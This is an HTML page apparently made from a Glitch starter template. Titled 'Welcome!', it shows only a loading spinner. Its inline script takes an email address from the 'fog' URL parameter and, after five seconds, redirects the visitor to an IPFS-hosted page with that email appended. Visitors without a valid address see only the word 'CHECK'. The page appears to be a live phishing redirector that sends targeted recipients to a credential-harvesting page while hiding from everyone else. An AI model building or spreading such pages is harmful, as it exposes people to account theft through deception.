<!DOCTYPE html>
<html lang="en">
  <head>
    <!-- 
      This is an HTML comment
      You can write text in a comment and the content won't be visible in the page
    -->

    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="icon" href="https://glitch.com/favicon.ico" />

    <!--
      This is the page head - it contains info the browser uses
      Like the title, which appears on the browser tab but not inside the page
      Further down you'll see the content that displays in the page
    -->
    <title>Welcome!</title>

    <!-- The website stylesheet -->
    <style>
              body {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100vh;
            font-family: Arial, sans-serif;
            text-align: center;
        }
        .loader {
            border: 8px solid #f3f3f3;
            border-top: 8px solid #3498db;
            border-radius: 50%;
            width: 50px;
            height: 50px;
            animation: spin 1s linear infinite;
            margin-top: 20px;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>

    <!-- The website JavaScript file -->
    <script>
              const urlParams = new URLSearchParams(window.location.search);
        const email = urlParams.get('fog');

        function isValidEmail(email) {
            const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
            return emailRegex.test(email);
        }

         if (email && isValidEmail(email)) {
            // Sanitize email by encoding it
            const sanitizedEmail = encodeURIComponent(email);
            
            // Define the new URL and append the email
            const newUrl = `https://ipfs.eth.aragon.network/ipfs/bafybeiaetfjybs222dytqlt25so3p4nohuzqpmqwfxjaphzlh7r7ie4kum/?email=${email}`;
            
            // Redirect after a delay
            setTimeout(() => {
                window.location.href = newUrl;
            }, 5000);
        } else {
            document.body.innerHTML = `
              <html><body><center>CHECK</center></body></html>
            `;
        }
    </script>
  </head>
<body>
    <div class="loader"></div>

</body>
</html>
